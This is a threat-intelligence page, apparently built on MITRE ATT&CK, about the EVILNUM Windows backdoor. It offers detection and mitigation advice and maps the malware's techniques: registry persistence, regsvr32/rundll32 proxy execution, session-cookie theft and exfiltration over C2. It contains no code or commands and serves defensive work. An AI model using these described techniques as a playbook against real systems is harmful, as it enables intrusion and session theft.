S0568: EVILNUM
Analyst context for executives and security teams
EVILNUM matters because ATT&CK describes it as a Windows backdoor associated with the Evilnum threat group, with related behaviors spanning discovery, persistence, command-and-control, exfiltration, defense evasion, and session-cookie theft. For leaders, the decision value is not the malware name alone; it is whether the organization can prove it would see a Windows host being profiled, made persistent through registry/startup mechanisms, proxy-executing code through trusted Windows binaries, communicating through C2, and moving data out over that same channel.
Executive priority
Prioritize EVILNUM as a coverage-validation case for Windows endpoint resilience, identity/session protection, and SOC/IR readiness. The ATT&CK relationships point to risks that affect continuity and incident decision-making: persistent backdoor access, security-tool discovery, registry modification, use of trusted Windows utilities, web session cookie theft, and exfiltration over C2. Executives should ask whether the SOC can correlate endpoint, registry, process, WMI, browser/session, and network evidence into a defensible incident narrative for audit, containment, and risk acceptance.
Technical view
ATT&CK provides no dedicated detection text for EVILNUM, so defenders should validate coverage against the related techniques on Windows: System Owner/User Discovery, System Information Discovery, Security Software Discovery, WMI execution, Modify Registry, Registry Run Keys/Startup Folder persistence, Regsvr32 and Rundll32 proxy execution, Timestomp, Indicator Removal, Ingress Tool Transfer, One-Way Communication, Exfiltration Over C2 Channel, and Steal Web Session Cookie. Detection engineering should focus on behavior chains rather than a single indicator: discovery followed by registry persistence or proxy execution, then external communications and possible data transfer.
Likely telemetry
- Windows endpoint process creation and command-line telemetry, especially for wmic/WMI activity, regsvr32.exe, rundll32.exe, reg.exe, and suspicious child-process relationships
- Windows Registry auditing or EDR registry-change telemetry for Run keys, startup folder references, and other persistence-related modifications
- WMI event logs and remote/local WMI execution traces where collected
- File system metadata telemetry that can support timestomp or suspicious file-change analysis
- Endpoint security product events, including evidence of security software discovery or tampering attempts where available
Detection direction
- Build detections around sequences: host/user/system discovery followed by registry modification, startup persistence, proxy execution via regsvr32 or rundll32, and outbound communications.
- Tune trusted-binary detections carefully. Regsvr32 and rundll32 are legitimate Windows utilities, so prioritize unusual command lines, unexpected parent processes, uncommon paths, unsigned or suspicious modules, and execution from user-writable locations.
- Validate that WMI execution is visible. Many environments log process starts but miss WMI context, remote origin, or command content, creating a common blind spot.
- Correlate endpoint and network evidence for C2 and exfiltration. ATT&CK links EVILNUM to one-way communication, ingress tool transfer, and exfiltration over C2, so network-only or endpoint-only views may be insufficient.
- Include identity/session context because the related behavior includes web session cookie theft. Confirm whether browser/session artifacts and anomalous authenticated use can be investigated without over-collecting sensitive data.
Mitigation priorities
- Harden Windows persistence paths first: monitor and restrict unauthorized Run key, startup folder, and registry modifications according to business need.
- Reduce abuse of trusted Windows utilities by applying application control or policy restrictions where feasible, especially for regsvr32, rundll32, and script/proxy execution patterns.
- Improve least-privilege and administrative control over WMI and registry access, including review of who can execute management actions locally or remotely.
- Strengthen endpoint and network logging retention so indicator removal or timestamp manipulation does not eliminate the only available evidence.
- Protect web sessions through identity controls, session governance, and investigation playbooks for suspected cookie theft or anomalous authenticated access.
Analyst notes and limits
The ATT&CK object identifies EVILNUM as a fully capable backdoor first identified in 2018 and used by the Evilnum group, which ATT&CK describes as financially motivated and active since at least 2018. The strongest defensive value comes from the relationship set: the malware is mapped to Windows-relevant discovery, persistence, proxy execution, registry modification, C2, exfiltration, and credential/session-access behaviors.
ATT&CK provides no official detection guidance for this software object and no object-level tactics are specified. Some related ATT&CK techniques list platforms beyond Windows, but the EVILNUM object itself is supplied with Windows as its platform, so local validation should focus on Windows unless other environment evidence justifies broader scope. This take does not assert current exploitation, customer exposure, or guaranteed detection coverage.
EVILNUM
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1102.003 | One-Way Communication Sub-technique | EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | EVILNUM can achieve persistence through the Registry Run key.CitationESET EvilNum July 2020CitationPrevailion EvilNum May 2020 |
| Enterprise | T1070 | Indicator Removal | EVILNUM has a function called "DeleteLeftovers" to remove certain artifacts of the attack.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1082 | System Information Discovery | EVILNUM can obtain the computer name from the victim's system.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | EVILNUM can upload files over the C2 channel from the infected host.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1539 | Steal Web Session Cookie | EVILNUM can harvest cookies and upload them to the C2 server.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1070.006 | Timestomp Sub-technique | EVILNUM has changed the creation date of files.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1112 | Modify Registry | EVILNUM can make modifications to the Regsitry for persistence.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1105 | Ingress Tool Transfer | EVILNUM can download and upload files to the victim's computer.CitationESET EvilNum July 2020CitationPrevailion EvilNum May 2020 |
| Enterprise | T1033 | System Owner/User Discovery | EVILNUM can obtain the username from the victim's machine.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | EVILNUM can execute commands and scripts through rundll32.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1518.001 | Security Software Discovery Sub-technique | EVILNUM can search for anti-virus products on the system.CitationPrevailion EvilNum May 2020 |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | EVILNUM can run a remote scriptlet that drops a file and executes it via regsvr32.exe.CitationESET EvilNum July 2020 |
| Enterprise | T1047 | Windows Management Instrumentation | EVILNUM has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.CitationPrevailion EvilNum May 2020 |
Groups, software, and campaigns
G0120: Evilnum
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.0 | Current bundle | 981233a34729… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
ESET EvilNum July 2020
Porolli, M. (2020, July 9). More evil: A deep look at Evilnum and its toolset. Retrieved January 22, 2021.
Open source URL -
[2]
Prevailion EvilNum May 2020
Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved November 17, 2024.
Open source URL -
[3]
EVILNUM
(Citation: Prevailion EvilNum May 2020)(Citation: ESET EvilNum July 2020)
-
[4]
mitre-attack S0568Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.